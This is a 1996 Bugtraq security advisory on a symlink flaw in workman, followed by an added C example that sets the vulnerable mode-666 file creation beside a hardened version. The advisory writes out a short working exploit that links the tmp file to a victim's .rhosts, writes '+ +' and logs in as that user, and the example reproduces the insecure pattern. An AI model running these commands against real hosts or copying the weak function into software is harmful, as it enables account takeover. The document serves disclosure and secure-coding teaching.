Approved-By: ALEPH1@UNDERGROUND.ORG
Approved-By:  Gregory Hull <gahull@CCS.NEU.EDU>
Message-ID: <199608261621.MAA24980@pinatubo.ccs.neu.edu>
Date: 	Mon, 26 Aug 1996 12:21:15 -0400
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
Sender: proff
From: Gregory Hull <gahull@ccs.neu.edu>
Subject: r00t advisory -- workman vulnerability
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>

r00t advisory                                           [ workman       ]
                                                        [ Aug 25 1996   ]

-- Synopsis
There exists a vulnerability in workman that will allow any user to create
and write to files owned by the user who is running workman.  Workman creates
a mode 666 file in /tmp and will gladly follow a symbolic link to its
target.

-- Exploitability
The exploit is absurdly simple:
$ ln -s /home/target_user/.rhosts /tmp/.wm_pid
# wait for target user to run workman
$ echo "+ +" >/home/target_user/.rhosts
$ rlogin -l target_user localhost

-- Fixes ?
The author of workman has been alerted to this problem and a patch is available
from ggal@ccs.neu.edu.

r00t -- http://www.r00t.org
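
-- Added example (not part of the original advisory)
The file-creation pattern described in the Synopsis, next to a hardened form.
This is an added illustration, not workman's source and not the patch the
advisory mentions; the function names and the demo path are assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Pattern the advisory describes (reconstructed, not workman's source):
 * a mode 666 file at a predictable path, opened through any symlink. */
int write_pid_weak(const char *path, pid_t pid)
{
    mode_t old = umask(0);              /* yields the 666 mode reported */
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
    umask(old);
    if (fd < 0)
        return -1;
    dprintf(fd, "%ld\n", (long)pid);
    return close(fd);
}

/* Hardened form: refuse any pre-existing name, never follow a link,
 * create owner-only, then verify what was actually opened. */
int write_pid_safe(const char *path, pid_t pid)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                      /* EEXIST: planted file or symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    dprintf(fd, "%ld\n", (long)pid);
    return close(fd);
}

int main(void)
{
    const char *path = "/tmp/.demo_pid";   /* constructed demo path */
    int rc = write_pid_safe(path, getpid());
    printf("write_pid_safe(%s) -> %d\n", path, rc);
    return 0;
}
```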

